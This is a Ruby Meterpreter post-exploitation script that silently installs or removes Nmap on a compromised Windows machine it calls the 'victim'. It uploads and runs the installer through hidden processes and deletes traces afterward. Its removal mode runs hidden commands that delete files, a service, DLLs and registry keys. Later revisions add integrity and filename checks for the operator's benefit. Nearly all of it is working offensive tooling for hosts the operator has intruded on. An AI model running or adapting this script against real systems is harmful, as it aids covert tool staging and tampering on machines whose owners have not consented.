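# $Id: deploy_nmap.rb 8/8/2011
# email: zitstif[@]gmail.com
# website: http://zitstif.no-ip.org/
# name: Kyle Young
# Meterpreter script for deploying nmap on victim Windows Machine
#---------------------------------------------------------------
#
# What this script does, in order:
#   -r : removes an Nmap install (files, per-user Start Menu folder, a few
#        DLLs, the rpcapd service, WinPcap, registry keys, the user PATH entry)
#   otherwise: fetches the "latest stable self-installer" link from
#        nmap.org, downloads it locally, uploads it to the target, runs it
#        silently (/S) and deletes the installer on both ends.
#
# Security notes for operators:
#   * The installer is a binary that gets EXECUTED on the target. It is
#     fetched over HTTPS (transport integrity only). Pass -c <sha256> with a
#     digest you obtained out-of-band to have the download checked before it
#     is uploaded; without -c the script only prints the digest it saw.
#   * The installer file name comes from nmap.org's HTML, i.e. from remote
#     content. It is validated against a strict pattern before being spliced
#     into meterpreter console commands or used as a local file name.
#   * Removal strips only the Nmap entry from the user's PATH value instead
#     of overwriting the whole value with " " as the original did.
#
# Known limitations (unchanged from the original):
#   * 32-bit vs 64-bit is decided from the meterpreter's own platform string,
#     so a 32-bit meterpreter on a 64-bit host looks in the wrong directory.
#   * Only the per-user Start Menu folder is removed; an all-users shortcut
#     would be left behind -- TODO confirm where the installer puts it.
#   * Commands sent through cmd.exe are fire-and-forget; no exit status is
#     checked, and the WinPcap directory is removed right after its
#     uninstaller is launched (same race as the original).

require 'open-uri'   # kept for compatibility; Kernel#open is no longer used below
require 'net/http'
require 'net/https'
require 'openssl'
require 'uri'
require 'digest'

session = client

force           = false
removal         = false
expected_sha256 = nil

# Print the help text and stop the script.
def usage()
  print_line("Meterpreter script for deploying nmap on a victim machine")
  print_line("Usage:\tdeploy_nmap")
  print_line("OR:\tdeploy_nmap -f\n")
  print_line("OPTIONS:\n")
  print_line("-h\tThis help menu")
  print_line("-f\tForce the install of nmap")
  print_line("-r\tRemove Nmap (this will also uninstall WinPcap)")
  print_line("-c <sha256>\tOnly install if the downloaded installer matches this SHA-256")
  raise Rex::Script::Completed
end

# Run `cmd` on the target via "cmd.exe /c", hidden. Fire-and-forget: nothing
# is read back, so failures are silent (the original behaved the same; it
# additionally asked for a channel it never read, which is dropped here).
def run_hidden(cmd)
  client.sys.process.execute("cmd.exe /c #{cmd}", nil, { 'Hidden' => true })
end

# Directory the Nmap self-installer uses. The installer is 32-bit, so on a
# 64-bit platform it lands under "Program Files (x86)".
def nmap_dir
  client.platform =~ /win64/ ? 'C:\Program Files (x86)\Nmap' : 'C:\Program Files\Nmap'
end

# Directory WinPcap (pulled in by the Nmap installer) lives in.
def winpcap_dir
  client.platform =~ /win64/ ? 'C:\Program Files (x86)\WinPcap' : 'C:\Program Files\WinPcap'
end

# True when nmap.exe is present in the expected install directory. stat()
# raises when the file is missing, which is the "not installed" case.
def nmap_installed?
  client.fs.file.stat("#{nmap_dir}\\nmap.exe")
  true
rescue
  false
end

# Delete one registry key given as "HKLM\\Path\\To\\Key". Failures are
# reported instead of silently ignored; returns nil on failure.
def remove_key(key)
  root_key, base_key = client.sys.registry.splitkey(key)
  client.sys.registry.delete_key(root_key, base_key)
rescue => e
  print_error("Could not delete #{key}: #{e}")
  nil
end

# Remove the Nmap directory from HKCU\Environment\PATH, keeping every other
# entry. The value is rewritten with its existing type; if it cannot be read
# or written the PATH is left untouched and an error is printed.
def strip_nmap_from_user_path
  key = client.sys.registry.open_key(HKEY_CURRENT_USER, 'Environment', KEY_READ | KEY_WRITE)
  begin
    value   = key.query_value('PATH')
    entries = value.data.to_s.split(';')
    kept    = entries.reject { |e| e.strip =~ /\\Nmap\\?\z/i }
    if kept.length == entries.length
      print_status("No Nmap entry found in the user PATH; leaving it alone")
    else
      key.set_value('PATH', value.type, kept.join(';'))
      print_status("Removed the Nmap entry from the user PATH")
    end
  ensure
    key.close
  end
rescue => e
  print_error("Could not adjust the user PATH: #{e}")
end

# GET https://host/path with certificate verification. Returns the body on a
# 2xx response, nil (after printing the status) otherwise.
def https_get(host, path)
  http = Net::HTTP.new(host, 443)
  http.use_ssl     = true
  http.verify_mode = OpenSSL::SSL::VERIFY_PEER
  resp = http.start { |h| h.get(path) }
  return resp.body if resp.is_a?(Net::HTTPSuccess)
  print_error("GET https://#{host}#{path} returned HTTP #{resp.code}")
  nil
end

# Find the "Latest stable release self-installer" link in the download page
# and return it as a URI, or nil when it is missing. The first "-quoted
# attribute on the matching line is taken as the href, as the original did.
# Only links to nmap.org whose file name looks like nmap-<ver>-setup.exe are
# accepted: the name is later used as a local file name and inside console
# commands, so it must not carry anything but that shape.
def find_installer_url(html)
  html.each_line do |line|
    next unless line =~ /Latest stable<\/u> release self-installer:/
    href = line.split('"')[1].to_s
    begin
      uri = URI.join("https://nmap.org/", href)
    rescue URI::InvalidURIError
      print_error("Installer link on the download page is not a valid URL: #{href.inspect}")
      return nil
    end
    unless uri.host == 'nmap.org'
      print_error("Installer link points off nmap.org (#{uri.host}); refusing to download it")
      return nil
    end
    unless File.basename(uri.path) =~ /\Anmap-[\w.\-]+-setup\.exe\z/
      print_error("Installer file name #{File.basename(uri.path).inspect} does not look like nmap-<version>-setup.exe")
      return nil
    end
    return uri
  end
  nil
end

@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "This is the help menu" ],
  "-f" => [ false, "Force install" ],
  "-r" => [ false, "Remove nmap" ],
  "-c" => [ true,  "Expected SHA-256 of the installer; abort if the download does not match" ]
)

@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-h"
    usage()
  when "-f"
    print_status("'Force Install' option selected..")
    force = true
  when "-r"
    print_status("WARNING: End user has vouched for the removal of nmap!")
    removal = true
  when "-c"
    expected_sha256 = val.to_s.strip.downcase
    unless expected_sha256 =~ /\A[0-9a-f]{64}\z/
      print_error("-c expects a 64-character hex SHA-256 digest")
      raise Rex::Script::Completed
    end
  end
}

unless client.platform =~ /win32|win64/
  print_error("This meterpreter script won't work on this system!")
  raise Rex::Script::Completed
end

############UNINSTALL SECTION##############
if removal
  winver = session.sys.config.sysinfo

  print_status("Deleting nmap files...")
  run_hidden("rmdir /S /Q \"#{nmap_dir}\"")

  print_status("Removing start menu entries..")
  # XP/2000/2003 keep the Start Menu directly under the profile; everything
  # newer uses the roaming AppData folder, which %APPDATA% resolves to. Using
  # the env var instead of an explicit "Windows 7|Vista|2008" list also covers
  # later Windows versions.
  if winver["OS"] =~ /Windows XP|Windows 2000|Windows 2003/
    run_hidden("rmdir /S /Q \"%USERPROFILE%\\Start Menu\\Programs\\Nmap\"")
  else
    run_hidden("rmdir /S /Q \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Nmap\"")
  end

  print_status("Removing a few dlls...")
  run_hidden("del %SYSTEMROOT%\\system32\\Packet.dll")
  if winver["OS"] =~ /Windows XP|Windows 2000|Windows 2003/
    # pthreadVC.dll is a file: `del`, not `rmdir /S /Q` as in the original.
    run_hidden("del %SYSTEMROOT%\\system32\\pthreadVC.dll")
  end

  print_status("Deleting rpcapd service..")
  run_hidden("sc delete rpcapd")

  print_status("Uninstalling Winpcap..")
  run_hidden("\"#{winpcap_dir}\\uninstall.exe\" /S")
  # NOTE: launched asynchronously; the rmdir below may run while the
  # uninstaller is still up (same ordering as the original).
  run_hidden("rmdir /S /Q \"#{winpcap_dir}\"")

  keys32 = [
    "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Nmap",
    "HKLM\\SOFTWARE\\WinPcap",
    "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst"
  ]
  # On 64-bit only the Nmap uninstall key under Wow6432Node is removed, as in
  # the original. NOTE(review): the WinPcap keys probably also live under
  # Wow6432Node there -- confirm before adding them.
  key64 = "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Nmap"

  print_status("Removing the Nmap entry that the installation added to the user PATH..")
  strip_nmap_from_user_path

  print_status("Deleting registry keys created by Nmap...")
  keys_to_remove = client.platform =~ /win64/ ? [key64] : keys32
  keys_to_remove.each { |k| remove_key(k) }

  print_status("Removal of Nmap has completed..")
  raise Rex::Script::Completed
end

#Check to see if nmap is already installed..#
unless force
  print_status("Checking to see if nmap is already installed in #{nmap_dir}..")
  if nmap_installed?
    print_error("Nmap appears to be already installed! Quitting!")
    print_status("If you want to do a force install of nmap, please use -f")
    raise Rex::Script::Completed
  end
  print_status("Nmap doesn't appear to be installed")
end

############INSTALL SECTION##############
print_status("Looking up the latest stable Nmap installer on nmap.org..")
page = https_get('nmap.org', '/download.html')
raise Rex::Script::Completed if page.nil?

installer = find_installer_url(page)
if installer.nil?
  print_error("Couldn't find the 'Latest stable release self-installer' link on the download page")
  raise Rex::Script::Completed
end
filename = File.basename(installer.path)

print_status("Downloading #{filename} to the local system..")
print_status("This may take a little while..")
body = https_get(installer.host, installer.path)
raise Rex::Script::Completed if body.nil?
print_status("Done downloading nmap to local system..")

# Integrity check on the binary that is about to be executed on the target.
digest = Digest::SHA256.hexdigest(body)
if expected_sha256
  if digest != expected_sha256
    print_error("SHA-256 mismatch: got #{digest}, expected #{expected_sha256}. Not uploading.")
    raise Rex::Script::Completed
  end
  print_status("Installer SHA-256 verified")
else
  print_status("SHA-256 of the downloaded installer: #{digest}")
  print_status("No -c given: the installer has NOT been checked against a known-good digest")
end

# File.open rather than Kernel#open: the name originates from remote HTML
# and Kernel#open treats a leading "|" as a command to run.
File.open(filename, "wb") { |f| f.write(body) }

print_status("Uploading to victim..")
session.console.run_single("upload #{filename}")
print_status("Now installing Nmap with /S switch..")
session.console.run_single("execute -H -f #{filename} -a /S")

# Wait for nmap.exe to show up instead of a blind 15 second sleep; the
# installer file is cleaned up either way once the wait is over.
print_status("Waiting for the installer to finish (up to 120 seconds)..")
deadline = Time.now + 120
sleep 5 until nmap_installed? || Time.now > deadline
if nmap_installed?
  # nmap.exe appears before the silent install is fully done; give it a
  # moment so the delete below does not hit a file that is still in use.
  sleep 10
  print_status("nmap.exe is present in #{nmap_dir}")
else
  print_error("nmap.exe did not appear in #{nmap_dir} within the timeout; the install may still be running or may have failed")
end

print_status("Deleting the install file on victim machine..")
begin
  client.fs.file.rm(filename)
rescue => e
  print_error("Could not delete #{filename} on the victim: #{e}")
end

print_status("Deleting the install file locally..")
File.delete(filename) if File.exist?(filename)

# The original ran `cmd.exe /c set PATH=...` in its own process, which
# changes nothing outside that process; the full path is reliable instead.
print_status("Use the 'shell' command and run \"#{nmap_dir}\\nmap.exe\" -h")
print_status("If plain 'nmap' is not found in your shell, set PATH=%PATH%;#{nmap_dir} in that shell first")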